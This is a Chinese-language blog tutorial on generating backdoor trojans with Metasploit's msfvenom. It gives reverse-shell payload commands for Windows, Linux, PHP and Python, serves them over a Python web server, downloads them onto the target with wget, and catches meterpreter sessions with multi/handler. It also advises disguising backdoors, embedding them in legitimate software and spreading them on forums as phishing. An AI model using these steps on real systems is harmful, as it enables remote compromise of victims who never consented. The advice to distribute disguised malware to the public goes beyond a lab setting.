渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

MsfVenom

        首先msf就是Metaaploit,venom就是病毒。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。进一步来说,msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

Msfvenom使用

>生成后门

#msfvenom在bash shell里使用,不是msf终端,

        如果我们不清楚msfvenom到如何使用,可以输入msfvenom -h来查看帮助,msfvenom支持各种操作平台,各种脚本语言的木马的生成,在生成时需要你指定一种类型,比如说你要生成windows的,或者是Linux的,等等。

windows可执行程序后门:msfvenom-p windows/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom-p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom-p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

有关命令的一些参数:

 在执行代码后我们查看一下生成的文件:

        那么生成完成木马后门了,我们如何传输,就是如何将生成的exe可执行文件发送给目标机器,这里我们有一个通用的方法,就是利用python快速开启一个web服务,python3 -m http.server


之后我们打开一个网页,输入192.168.164.130:8000/demo.exe就会弹出一个下载提示,点击下载就完成了我们的一个木马传输。

需要注意的是:一定要输入自己kali的IP地址,还有就是冒号后面的端口靠一定要和你所开启的端口号一致,像是上面我们默认的开启的8000,然而你也可以自己设置开启的端口号,在命令后面加上端口号就行。还有为什么后面是加上/demo.exe就可以发现文件,是因为我们生成的木马文件一般都自动保存在了home目录,如果是在其他目录下,只需要在文件前面加上你自己保存的路径即可。

或者你还可以利用其他传播方式,比如说你对这个后门进行了免杀,伪装,或者是注入嵌入到其他正常的软件,然后在社区论坛,贴吧上面进行广泛的传播。这些就是钓鱼的一个方式。

 >开启监听

>攻击机监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set Ihost 192.168.164.130
lhost =>192.168.123.159
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.164.130:9999 

上面我们是成功完成了一个木马后门的生成和传输,但是我们对于这个9999端口的监听并没有打开,我们需要进入msf来进行监听。

进入msf以后我们需要使用一个模块,use exploit/multi/handler ,这个模块就是为了去开启一个监听端口,然后我们需要对模块进行设置,首先要设置payload为我们生成后门时使用的payload相同,set payload windows/x64/meterpreter/reverse_tcp,设置lhost,set lhost 192.168.164.130,设置lport,set lport 9999,设置完成后我们可以查看一下:可以看到是没有任何问题的。

run运行模块就可以开启监听了,然后我们转到靶机运行一下demo.exe,返回kali可以看到我们直接获取到了一个meterpreter会话,拿到了权限。

Msfvenom查看

上面我们是针对windows来生成了一个木马后面,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:

#查看msfvenom支持的格式:msfvenom -l formats
#查看msfvenom支持的攻击载荷:msfvenom -I payloads    针对win:msfvenom -l payloads |grep windows
#查看msfvenom支持的编码:msfvenom -l encoders
#查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options 

>Linux

我们再来看一下对于Linux如何操作。其实和windows区别并不大

  1. msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.164.130 lport=8888 -f elf -o linux_demo.elf 
  2. use exploit/multi/handler
  3. set payload inux/x64/meterpreter/reverse_tcp,set lhost 192.168.164.130,set lport 8888
  4. run
  5. python3 -m http.server
  6. 转到Linux靶机,wget http://192.168.164.130:8000/linux_demo.elf
  7. 运行linux_demo.elf

综上所述我们得到了两个meterpreter,分别是windows的和linux的。

  • 7
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

慵懒之龟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值